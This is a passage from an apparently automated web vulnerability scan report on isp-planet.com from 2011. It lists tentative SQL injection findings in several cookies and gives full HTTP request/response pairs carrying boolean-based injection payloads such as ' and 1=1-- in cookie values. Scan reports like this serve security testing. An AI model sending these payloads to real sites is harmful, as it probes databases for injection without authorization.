<META name="description" content="ISP-Planet has business and marketing advice for ISPs, plus specialized isp information resources. It reports on IS
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695826/641338/581996/581034;s=9538;x=3584;f=658476016;u=j;z=20110218123030" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695826/641338/581996/581034;s=9538;x=3584;f=658476016;u=j;z=20110218123030" alt="Click here"></a>
</noscript>
</div>

</TD>
</TR>
<TR>
<TD align="center"><span class='quad_S'><style type="text/css">
span.ciu_wrapper div { padding: 10px; }
</style><span class="ciu_wrapper">

<script language="JavaScript">zzfocrender("203", "9538", "644262/641338/581996/581034", "59", "600", "200", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=644262/641338/581996/581034;s=9538;x=15104;f=329052731;u=j;z=20110218123030" target="_blank">
<img border="0" width="600" height="200" src="http://o1.qnsr.com/cgi/x?;n=203;c=644262/641338/581996/581034;s=9538;x=15104;f=329052731;u=j;z=20110218123030" alt="Click here"></a>
</noscript>
</span></div>
</TD>
</TR>
</table>

</center>
</td> </TR>
<TR>
<TD width="20%" valign="TOP">
<CENTER>
&nbsp;<A href="http://www.internet.com/"><IMG src="/img/icom-logo-micro.gif" width="130" height="28" border="0" alt="Internet.com"></A><BR>
<!-- =====SPONSORSHIP===== -->
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /about/sitemap.html?1'%20and%201%3d2--%20=1 --><span class='quad_sitetext-1'></div>

<div align="left"> <p>&nbsp;</p>
<p align="center"><BR>
<!--AdSpacesite=internetcom&foo=bar&size=125x125&PagePos=10&channel=_CHANNEL_&content_site=_SITE_&feature=_FEATURE_-->
<span class='quad_J'>
<script language="JavaScript">zzfocrender("203", "9538", "641865/641338/581996/581034", "6", "125", "125", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=641865/641338/581996/581034;s=9538;x=1536;f=1208178577;u=j;z=20110218123030" target="_blank">
<img border="0" width="125" height="125" src="http://o1.qnsr.com/cgi/x?;n=203;c=641865/641338/581996/581034;s=9538;x=1536;f=120817857
...[SNIP]...

1.8. http://www.isp-planet.com/resources/directories/state_puc.html [qsg cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.isp-planet.com
Path:   /resources/directories/state_puc.html

Issue detail

The qsg cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the qsg cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /resources/directories/state_puc.html HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508'%20and%201%3d1--%20; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:23:26 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:24:26 GMT
Connection: close
Content-Type: text/html
Content-Length: 55371

<HTML>
<HEAD>
<TITLE>ISP Planet - Resources - State PUC Directory </TITLE>
<META NAME="description" CONTENT="information on information and resources for ISPs">
<META NAME="channel" CONTENT="ISP Resou
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695826/641338/581996/581034;s=9538;x=3584;f=459193610;u=j;z=20110218122326" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695826/641338/581996/581034;s=9538;x=3584;f=459193610;u=j;z=20110218122326" alt="Click here"></a>
</noscript>
</div>

</TD>
</TR>
<TR>
<TD align="center"><span class='quad_S'><style type="text/css">
span.ciu_wrapper div { padding: 10px; }
</style><span class="ciu_wrapper">

<script language="JavaScript">zzfocrender("203", "9538", "644262/641338/581996/581034", "59", "600", "200", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=644262/641338/581996/581034;s=9538;x=15104;f=573923731;u=j;z=20110218122326" target="_blank">
<img border="0" width="600" height="200" src="http://o1.qnsr.com/cgi/x?;n=203;c=644262/641338/581996/581034;s=9538;x=15104;f=573923731;u=j;z=20110218122326" alt="Click here"></a>
</noscript>
</span></div>
</TD>
</TR>
</table>
</TD></TR>
<TR>
<TD WIDTH="20%" VALIGN="TOP">
<CENTER>
<A HREF="http://www.internet.com/"><IMG SRC="/img/icom-logo-micro.gif" WIDTH=130 HEIGHT=28 BORDER=0 ALT="Internet.com"></A>
<A HREF="/index.html"><IMG SRC="/img/planet-mini.gif" ALT="ISP-Planet" WIDTH="106" HEIGHT="62" HSPACE="0" VSPACE="0" BORDER="0"></A><BR>
<!-- =====SPONSORSHIP===== -->
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /resources/directories/state_puc.html --><span class='quad_sitetext-1'></div>

<div align="left"> <p>&nbsp;</p>
<p align="center"><BR>
<!--AdSpacesite=internetcom&foo=bar&size=125x125&PagePos=10&channel=_CHANNEL_&content_site=_SITE_&feature=_FEATURE_-->
<span class='quad_J'>
<script language="JavaScript">zzfocrender("203", "9538", "641865/641338/581996/581034", "6", "125", "125", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=641865/641338/581996/581034;s=9538;x=1536;f=947967202;u=j;z=20110218122326" target="_blank">
<img border="0" width=
...[SNIP]...

Request 2

GET /resources/directories/state_puc.html HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508'%20and%201%3d2--%20; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:23:28 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:24:28 GMT
Connection: close
Content-Type: text/html
Content-Length: 55381

<HTML>
<HEAD>
<TITLE>ISP Planet - Resources - State PUC Directory </TITLE>
<META NAME="description" CONTENT="information on information and resources for ISPs">
<META NAME="channel" CONTENT="ISP Resou
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695826/641338/581996/581034;s=9538;x=3584;f=396469399;u=j;z=20110218122328" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695826/641338/581996/581034;s=9538;x=3584;f=396469399;u=j;z=20110218122328" alt="Click here"></a>
</noscript>
</div>

</TD>
</TR>
<TR>
<TD align="center"><span class='quad_S'><style type="text/css">
span.ciu_wrapper div { padding: 10px; }
</style><span class="ciu_wrapper">

<script language="JavaScript">zzfocrender("203", "9538", "644262/641338/581996/581034", "59", "600", "200", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=644262/641338/581996/581034;s=9538;x=15104;f=1188201077;u=j;z=20110218122328" target="_blank">
<img border="0" width="600" height="200" src="http://o1.qnsr.com/cgi/x?;n=203;c=644262/641338/581996/581034;s=9538;x=15104;f=1188201077;u=j;z=20110218122328" alt="Click here"></a>
</noscript>
</span></div>
</TD>
</TR>
</table>
</TD></TR>
<TR>
<TD WIDTH="20%" VALIGN="TOP">
<CENTER>
<A HREF="http://www.internet.com/"><IMG SRC="/img/icom-logo-micro.gif" WIDTH=130 HEIGHT=28 BORDER=0 ALT="Internet.com"></A>
<A HREF="/index.html"><IMG SRC="/img/planet-mini.gif" ALT="ISP-Planet" WIDTH="106" HEIGHT="62" HSPACE="0" VSPACE="0" BORDER="0"></A><BR>
<!-- =====SPONSORSHIP===== -->
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /resources/directories/state_puc.html --><span class='quad_sitetext-1'></div>

<div align="left"> <p>&nbsp;</p>
<p align="center"><BR>
<!--AdSpacesite=internetcom&foo=bar&size=125x125&PagePos=10&channel=_CHANNEL_&content_site=_SITE_&feature=_FEATURE_-->
<span class='quad_J'>
<script language="JavaScript">zzfocrender("203", "9538", "641865/641338/581996/581034", "6", "125", "125", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=641865/641338/581996/581034;s=9538;x=1536;f=577855791;u=j;z=20110218122328" target="_blank">
<img border="0" widt
...[SNIP]...

1.9. http://www.isp-planet.com/services/merchants/index.html [intmintc__welcome cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.isp-planet.com
Path:   /services/merchants/index.html

Issue detail

The intmintc__welcome cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the intmintc__welcome cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/merchants/index.html HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome='%20and%201%3d1--%20; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:20:38 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:21:38 GMT
Connection: close
Content-Type: text/html
Content-Length: 56902

<HTML>
<HEAD>
<title>ISP-Planet - Value-Added Services - Merchant Account Providers Directory</title>
<meta name="channel" content="ISP Resources">
<meta name="author" content="Jeff Goldman">
<me
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695837/641639/641605/581996/581034;s=9538;x=3584;f=100210513;u=j;z=20110218122038" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695837/641639/641605/581996/581034;s=9538;x=3584;f=100210513;u=j;z=20110218122038" alt="Click here"></a>
</noscript>
</div>

</TD>
</TR>
<TR>
<TD align="center"><span class='quad_S'><style type="text/css">
span.ciu_wrapper div { padding: 10px; }
</style><span class="ciu_wrapper">

<script language="JavaScript">zzfocrender("203", "9538", "644257/641639/641605/581996/581034", "59", "600", "200", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=644257/641639/641605/581996/581034;s=9538;x=15104;f=1129950991;u=j;z=20110218122038" target="_blank">
<img border="0" width="600" height="200" src="http://o1.qnsr.com/cgi/x?;n=203;c=644257/641639/641605/581996/581034;s=9538;x=15104;f=1129950991;u=j;z=20110218122038" alt="Click here"></a>
</noscript>
</span></div>
</TD>
</TR>
</table>
</TD></TR>
<TR>
<TD WIDTH="20%" VALIGN="TOP">
<CENTER>
&nbsp;<A HREF="http://www.internet.com/"><IMG SRC="/img/icom-logo-micro.gif" WIDTH=130 HEIGHT=28 BORDER=0 ALT="Internet.com"></A>
<a href="http://www.isp-planet.com/"><IMG SRC="/img/planet-mini.gif" ALT="ISP-Planet" WIDTH="106" HEIGHT="62" HSPACE="0" VSPACE="0" BORDER="0"></a>
<BR>
<!-- =====SPONSORSHIP===== -->
<!-- : Missing QUAD ads for page_type: index on path www.isp-planet.com with position sitetext-1
url: /services/merchants/index.html --><span class='quad_sitetext-1'></div>

<div align="left"> <p>&nbsp;</p>
<p align="center"><BR>
<!--AdSpacesite=internetcom&foo=bar&size=125x125&PagePos=10&channel=_CHANNEL_&content_site=_SITE_&feature=_FEATURE_-->
<span class='quad_J'>
<script language="JavaScript">zzfocrender("203", "9538", "641824/641639/641605/581996/581034", "6", "125", "125", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=641824/641639/641605/581996/581034;s=9538;x=153
...[SNIP]...

Request 2

GET /services/merchants/index.html HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome='%20and%201%3d2--%20; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:20:41 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:21:41 GMT
Connection: close
Content-Type: text/html
Content-Length: 56890

<HTML>
<HEAD>
<title>ISP-Planet - Value-Added Services - Merchant Account Providers Directory</title>
<meta name="channel" content="ISP Resources">
<meta name="author" content="Jeff Goldman">
<me
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695837/641639/641605/581996/581034;s=9538;x=3584;f=808902152;u=j;z=20110218122041" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695837/641639/641605/581996/581034;s=9538;x=3584;f=808902152;u=j;z=20110218122041" alt="Click here"></a>
</noscript>
</div>

</TD>
</TR>
<TR>
<TD align="center"><span class='quad_S'><style type="text/css">
span.ciu_wrapper div { padding: 10px; }
</style><span class="ciu_wrapper">

<script language="JavaScript">zzfocrender("203", "9538", "644257/641639/641605/581996/581034", "59", "600", "200", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=644257/641639/641605/581996/581034;s=9538;x=15104;f=54155068;u=j;z=20110218122041" target="_blank">
<img border="0" width="600" height="200" src="http://o1.qnsr.com/cgi/x?;n=203;c=644257/641639/641605/581996/581034;s=9538;x=15104;f=54155068;u=j;z=20110218122041" alt="Click here"></a>
</noscript>
</span></div>
</TD>
</TR>
</table>
</TD></TR>
<TR>
<TD WIDTH="20%" VALIGN="TOP">
<CENTER>
&nbsp;<A HREF="http://www.internet.com/"><IMG SRC="/img/icom-logo-micro.gif" WIDTH=130 HEIGHT=28 BORDER=0 ALT="Internet.com"></A>
<a href="http://www.isp-planet.com/"><IMG SRC="/img/planet-mini.gif" ALT="ISP-Planet" WIDTH="106" HEIGHT="62" HSPACE="0" VSPACE="0" BORDER="0"></a>
<BR>
<!-- =====SPONSORSHIP===== -->
<!-- : Missing QUAD ads for page_type: index on path www.isp-planet.com with position sitetext-1
url: /services/merchants/index.html --><span class='quad_sitetext-1'></div>

<div align="left"> <p>&nbsp;</p>
<p align="center"><BR>
<!--AdSpacesite=internetcom&foo=bar&size=125x125&PagePos=10&channel=_CHANNEL_&content_site=_SITE_&feature=_FEATURE_-->
<span class='quad_J'>
<script language="JavaScript">zzfocrender("203", "9538", "641824/641639/641605/581996/581034", "6", "125", "125", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=641824/641639/641605/581996/581034;s=9538;x=1536;f=
...[SNIP]...

1.10. http://www.isp-planet.com/services/registrars/chart.html [qsg cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.isp-planet.com
Path:   /services/registrars/chart.html

Issue detail

The qsg cookie appears to be vulnerable to SQL injection attacks. The payloads 75422568'%20or%201%3d1--%20 and 75422568'%20or%201%3d2--%20 were each submitted in the qsg cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/registrars/chart.html HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=1450875422568'%20or%201%3d1--%20; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:27:17 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:28:17 GMT
Connection: close
Content-Type: text/html
Content-Length: 85525

<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Registrar Directory</title>
<meta name="channel" content="ISP Resources">
<meta name="author" content="ISP-Planet Staff">
<meta name="company"
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695839/641606/641605/581996/581034;s=9538;x=3584;f=1120555394;u=j;z=20110218122717" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695839/641606/641605/581996/581034;s=9538;x=3584;f=1120555394;u=j;z=20110218122717" alt="Click here"></a>
</noscript>
</div>

</TD>
</TR>
<TR>
<TD align="center"><span class='quad_S'><style type="text/css">
span.ciu_wrapper div { padding: 10px; }
</style><span class="ciu_wrapper">

<script language="JavaScript">zzfocrender("203", "9538", "644256/641606/641605/581996/581034", "59", "600", "200", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=644256/641606/641605/581996/581034;s=9538;x=15104;f=797076609;u=j;z=20110218122717" target="_blank">
<img border="0" width="600" height="200" src="http://o1.qnsr.com/cgi/x?;n=203;c=644256/641606/641605/581996/581034;s=9538;x=15104;f=797076609;u=j;z=20110218122717" alt="Click here"></a>
</noscript>
</span></div>
</TD>
</TR>
</table>
</TD></TR>
<TR>
<TD WIDTH="20%" VALIGN="TOP">
<CENTER>
&nbsp;<A HREF="http://www.internet.com/"><IMG SRC="/img/icom-logo-micro.gif" WIDTH=130 HEIGHT=28 BORDER=0 ALT="Internet.com"></A>
<a href="http://www.isp-planet.com/"><IMG SRC="/img/planet-mini.gif" ALT="ISP-Planet" WIDTH="106" HEIGHT="62" HSPACE="0" VSPACE="0" BORDER="0"></a>
<BR>
<!-- =====SPONSORSHIP===== -->
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/registrars/chart.html --><span class='quad_sitetext-1'></div>

<div align="left"> <p>&nbsp;</p>
<p align="center"><BR>
<!--AdSpacesite=internetcom&foo=bar&size=125x125&PagePos=10&channel=_CHANNEL_&content_site=_SITE_&feature=_FEATURE_-->
<span class='quad_J'>
<script language="JavaScript">zzfocrender("203", "9538", "641817/641606/641605/581996/581034", "6", "125", "125", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=641817/641606/641605/581996/581034;s=9538;x=1536;f=50
...[SNIP]...

Request 2

GET /services/registrars/chart.html HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=1450875422568'%20or%201%3d2--%20; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:27:19 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:28:19 GMT
Connection: close
Content-Type: text/html
Content-Length: 85515

<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Registrar Directory</title>
<meta name="channel" content="ISP Resources">
<meta name="author" content="ISP-Planet Staff">
<meta name="company"
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695839/641606/641605/581996/581034;s=9538;x=3584;f=800695765;u=j;z=20110218122719" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695839/641606/641605/581996/581034;s=9538;x=3584;f=800695765;u=j;z=20110218122719" alt="Click here"></a>
</noscript>
</div>

</TD>
</TR>
<TR>
<TD align="center"><span class='quad_S'><style type="text/css">
span.ciu_wrapper div { padding: 10px; }
</style><span class="ciu_wrapper">

<script language="JavaScript">zzfocrender("203", "9538", "644256/641606/641605/581996/581034", "59", "600", "200", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=644256/641606/641605/581996/581034;s=9538;x=15104;f=33456387;u=j;z=20110218122719" target="_blank">
<img border="0" width="600" height="200" src="http://o1.qnsr.com/cgi/x?;n=203;c=644256/641606/641605/581996/581034;s=9538;x=15104;f=33456387;u=j;z=20110218122719" alt="Click here"></a>
</noscript>
</span></div>
</TD>
</TR>
</table>
</TD></TR>
<TR>
<TD WIDTH="20%" VALIGN="TOP">
<CENTER>
&nbsp;<A HREF="http://www.internet.com/"><IMG SRC="/img/icom-logo-micro.gif" WIDTH=130 HEIGHT=28 BORDER=0 ALT="Internet.com"></A>
<a href="http://www.isp-planet.com/"><IMG SRC="/img/planet-mini.gif" ALT="ISP-Planet" WIDTH="106" HEIGHT="62" HSPACE="0" VSPACE="0" BORDER="0"></a>
<BR>
<!-- =====SPONSORSHIP===== -->
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/registrars/chart.html --><span class='quad_sitetext-1'></div>

<div align="left"> <p>&nbsp;</p>
<p align="center"><BR>
<!--AdSpacesite=internetcom&foo=bar&size=125x125&PagePos=10&channel=_CHANNEL_&content_site=_SITE_&feature=_FEATURE_-->
<span class='quad_J'>
<script language="JavaScript">zzfocrender("203", "9538", "641817/641606/641605/581996/581034", "6", "125", "125", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=641817/641606/641605/581996/581034;s=9538;x=1536;f=118726
...[SNIP]...

1.11. http://www.isp-planet.com/services/voip_wholesalers/chart.html [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.isp-planet.com
Path:   /services/voip_wholesalers/chart.html

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 21473983'%20or%201%3d1--%20 and 21473983'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/voip_wholesalers/chart.html HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.121473983'%20or%201%3d1--%20; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:30:47 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:31:47 GMT
Connection: close
Content-Type: text/html
Content-Length: 85141

<HTML>
<HEAD>
<title>ISP-Planet - Value-Added Services - VoIP Wholesale Provider Quick Reference Chart</title>
<meta name="channel" content="ISP Resources">
<meta name="author" content="Jeff Goldm
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695839/641606/641605/581996/581034;s=9538;x=3584;f=150531244;u=j;z=20110218123047" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695839/641606/641605/581996/581034;s=9538;x=3584;f=150531244;u=j;z=20110218123047" alt="Click here"></a>
</noscript>
</div>

</TD>
</TR>
<TR>
<TD align="center"><span class='quad_S'><style type="text/css">
span.ciu_wrapper div { padding: 10px; }
</style><span class="ciu_wrapper">

<script language="JavaScript">zzfocrender("203", "9538", "644256/641606/641605/581996/581034", "59", "600", "200", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=644256/641606/641605/581996/581034;s=9538;x=15104;f=1276478049;u=j;z=20110218123047" target="_blank">
<img border="0" width="600" height="200" src="http://o1.qnsr.com/cgi/x?;n=203;c=644256/641606/641605/581996/581034;s=9538;x=15104;f=1276478049;u=j;z=20110218123047" alt="Click here"></a>
</noscript>
</span></div>
</TD>
</TR>
</table>
</TD>
</TR>
<TR>
<TD WIDTH="150" VALIGN="TOP">
<CENTER>
&nbsp;<A HREF="http://www.internet.com/"><IMG SRC="/img/icom-logo-micro.gif" WIDTH=130 HEIGHT=28 BORDER=0 ALT="Internet.com"></A>
<a href="http://www.isp-planet.com/"><IMG SRC="/img/planet-mini.gif" ALT="ISP-Planet" WIDTH="106" HEIGHT="62" HSPACE="0" VSPACE="0" BORDER="0"></a>
<BR>
<!-- =====SPONSORSHIP===== -->
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/voip_wholesalers/chart.html --><span class='quad_sitetext-1'></div>

<div align="left"> <p>&nbsp;</p>
<p align="center"><BR>
<!--AdSpacesite=internetcom&foo=bar&size=125x125&PagePos=10&channel=_CHANNEL_&content_site=_SITE_&feature=_FEATURE_-->
<span class='quad_J'>
<script language="JavaScript">zzfocrender("203", "9538", "641817/641606/641605/581996/581034", "6", "125", "125", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=641817/641606/641605/581996/581034;s
...[SNIP]...

Request 2

GET /services/voip_wholesalers/chart.html HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.121473983'%20or%201%3d2--%20; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:30:49 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:31:49 GMT
Connection: close
Content-Type: text/html
